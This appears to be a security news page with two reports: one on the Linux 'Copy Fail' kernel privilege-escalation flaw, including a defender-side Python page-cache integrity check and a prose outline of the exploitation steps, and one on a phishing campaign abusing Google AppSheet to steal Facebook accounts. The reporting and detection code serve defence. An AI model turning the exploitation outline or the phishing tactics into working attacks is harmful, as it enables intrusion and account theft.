By manipulating the in-memory representation of executables, attackers can subtly alter their execution behaviour without changing files on disk; when such modifications target setuid-root executables, escalation to full root privileges is trivial. Root-cause analysis traces the vulnerability to a 2017 optimization introduced in Linux kernel version 4.14, which enabled in-place buffer reuse to improve performance but inadvertently weakened memory isolation guarantees, creating the conditions for an exploit.
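Because the tampering lives only in the page cache, a file's bytes as served by a normal read can differ from its bytes on disk. The check below is an added defender-side example, not the researchers' proof of concept: it hashes a binary once through the page cache and once with O_DIRECT (which bypasses the cache) and reports a mismatch. It assumes Linux and a filesystem that supports O_DIRECT; where that is unavailable it reports "unsupported" rather than guessing.

```python
"""Compare a binary's page-cache bytes with its on-disk bytes (Linux only).

Copy Fail alters the kernel page cache without touching the file on disk, so a
normal read (served from the cache) and an O_DIRECT read (served from the block
device) can disagree. A mismatch on a setuid binary is a strong sign of in-memory
tampering. Hypothetical defender helper, not the researchers' proof of concept.
"""
import hashlib
import mmap
import os

BLOCK = 1 << 20  # 1 MiB; a multiple of any common logical block size


def sha256_cached(path: str) -> str:
    """Hash the file through the normal read path, i.e. the page cache."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(BLOCK), b""):
            h.update(chunk)
    return h.hexdigest()


def sha256_direct(path: str) -> str:
    """Hash via O_DIRECT (bypasses the page cache). Needs an aligned buffer, which
    anonymous mmap memory provides; raises OSError where O_DIRECT is unsupported."""
    if not hasattr(os, "O_DIRECT"):
        raise OSError("O_DIRECT not available on this platform")
    fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    h = hashlib.sha256()
    try:
        with mmap.mmap(-1, BLOCK) as buf:
            while (n := os.readv(fd, [buf])) > 0:
                h.update(buf[:n])
    finally:
        os.close(fd)
    return h.hexdigest()


def check_page_cache(path: str) -> dict:
    """Return both hashes and a status: 'consistent', 'TAMPERED' or 'unsupported'."""
    cached = sha256_cached(path)
    try:
        direct = sha256_direct(path)
    except OSError:
        return {"path": path, "status": "unsupported", "cached": cached, "direct": None}
    status = "consistent" if cached == direct else "TAMPERED"
    return {"path": path, "status": status, "cached": cached, "direct": direct}
```

Run it over the setuid binaries the article names (for example `check_page_cache("/usr/bin/su")`); "TAMPERED" means the running system is serving different bytes than the disk holds, which a file-hash baseline alone would never reveal.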

Researchers have empirically validated the exploit on several distributions, including Ubuntu 24.04 LTS, Amazon Linux 2023, Red Hat Enterprise Linux 10.1, SUSE Linux Enterprise 16, and Debian, with a compact Python proof-of-concept achieving near-perfect reliability on all of them. Since the flaw affects virtually every Linux distribution released since 2017, it has drawn comparisons with earlier high-profile flaws such as Dirty Pipe (CVE-2022-0847). 

However, Copy Fail is more portable across kernel versions, more reliable, and is simpler to exploit, as it does not require specific offsets or narrowly scoped configurations to operate. To resolve the issue, kernel maintainers reverted the underlying optimization and reintroduced safer buffer handling mechanisms as part of versions 6.18.22, 6.19.12, and 7.0 of the kernel. 

Although major distributions have begun deploying patched kernels, inconsistent advisory publication has hampered coordinated response: security researcher Will Dormann noted that some platforms have issued updates without consistently referencing CVE-2026-31431, potentially stalling remediation and risk awareness at the enterprise level. 

Further technical analysis has revealed a practical exploitation pathway, illustrating how attackers can operationalise the vulnerability in real-world environments. The attack sequence typically begins by identifying a Linux host or container running a vulnerable kernel version, followed by preparing a Python-based trigger tailored to the target machine. 

The exploit can then be run either as a standard user on the host or from inside a compromised container, in both cases from a low-privilege context. Using the underlying flaw, it overwrites exactly four bytes in the kernel page cache, corrupting kernel-managed data and enabling privilege escalation. Ultimately this allows the attacker to elevate their process to UID 0 and obtain unrestricted root access.

As a result of the active threat landscape, Federal Civilian Executive Branch (FCEB) agencies have been instructed to resolve the vulnerability by May 15, 2026, in accordance with patches released by Linux distributions affected by this vulnerability. 

Where immediate patching is not feasible, interim mitigations, including disabling the affected functionality, segmenting networks, and tightening access controls, have been recommended as a means of reducing exposure and containing potential compromise paths. 

Given the active exploitation status of CVE-2026-31431, its extensive reach across the Linux ecosystem, and its relative ease of weaponisation, the flaw serves as a critical reminder of the risks inherent in longstanding kernel-level design decisions. The convergence of high reliability, minimal exploit complexity, and broad distribution exposure puts organizations under increasing pressure to verify their patch posture and expedite remediation. 

As a precautionary measure, security teams should prioritize kernel updates, closely monitor privilege escalation activity, and reassess controls around multi-tenant and containerised environments in which attack surfaces may be heightened. 

Threat actors will continue to seek out low-friction exploitation paths, which makes timely mitigation and disciplined system hardening necessary to preserve operational integrity and limit the impact of such kernel vulnerabilities.

Vietnam-Linked “AccountDumpling” Campaign Exploits Google AppSheet to Hijack Thousands of Facebook Accounts

A newly uncovered cybercrime campaign linked to Vietnamese actors has been leveraging Google AppSheet as a phishing relay to send deceptive emails aimed at compromising Facebook accounts.

The operation, dubbed “AccountDumpling” by Guardio, revolves around stealing Facebook accounts and reselling them through illicit online marketplaces controlled by the attackers. Researchers estimate that nearly 30,000 accounts have been breached in this coordinated campaign.

"What we found wasn't a single phishing kit," security researcher Shaked Chen wrote in a report shared with The Hacker News. "It was a living operation with real-time operator panels, advanced evasion, continuous evolution and a criminal-commercial loop that quietly feeds on the same accounts it helps steal back."

This discovery highlights a broader trend of Vietnamese threat groups using increasingly sophisticated tactics to gain unauthorized access to Facebook accounts, which are later sold in underground markets for profit.

The attack chain typically begins with phishing emails sent to Facebook Business users, falsely posing as messages from Meta Support. These emails warn recipients that their accounts risk permanent suspension unless they submit an appeal. Notably, the emails originate from a legitimate-looking Google AppSheet address ("noreply@appsheet.com"), helping them evade spam detection systems.

Victims are then directed to fraudulent websites designed to capture login credentials. Similar tactics were previously reported by KnowBe4 in May 2025.

In recent weeks, attackers have diversified their lures to trigger “Meta-related panic.” These include fake alerts about account bans, copyright violations, verification requests, job offers, and suspicious login activity. Guardio identified four primary attack patterns:
  • Phishing pages hosted on Netlify that mimic Facebook Help Center interfaces, collecting sensitive details such as birth dates, phone numbers, and ID documents, which are then transmitted to attacker-controlled Telegram channels.
  • Fake “blue badge” verification scams directing users through Vercel-hosted pages disguised as security checks, eventually harvesting credentials, business data, and two-factor authentication (2FA) codes.
  • Malicious PDF files hosted on Google Drive, posing as verification instructions, tricking users into submitting passwords, 2FA codes, ID images, and browser screenshots. These PDFs were created using a free Canva account.
  • Fraudulent job offers impersonating well-known brands such as WhatsApp, Adobe, Pinterest, Apple, and Coca-Cola to build trust and lure victims into further interaction on malicious platforms.
Across the first three attack clusters alone, associated Telegram channels were found to store around 30,000 victim records. Affected users span multiple countries, including the U.S., Italy, Canada, the Philippines, India, Spain, Australia, the U.K., Brazil, and Mexico, with many losing access to their accounts entirely.

Investigators traced part of the operation back to a Vietnamese individual after analyzing metadata embedded in the phishing PDFs, which listed the name “PHẠM TÀI TÂN” as the author. Further open-source investigation uncovered a website linked to this identity offering digital marketing services.

In a February 2023 post on X, the site’s account stated it "specializes in providing digital marketing services, marketing resources, and consulting on effective digital marketing strategies."

"Taken together, they form a consistent picture of a large, Vietnamese-based, mega operation," Chen said. "This campaign is bigger than a single AppSheet abuse. It's a window into the dark market around stolen Facebook assets, where access, business identity, ad reputation, and even account recovery have all become tradable commodities. Another entry in the pattern we keep surfacing: trusted platforms repurposed as delivery, hosting, and monetization layers."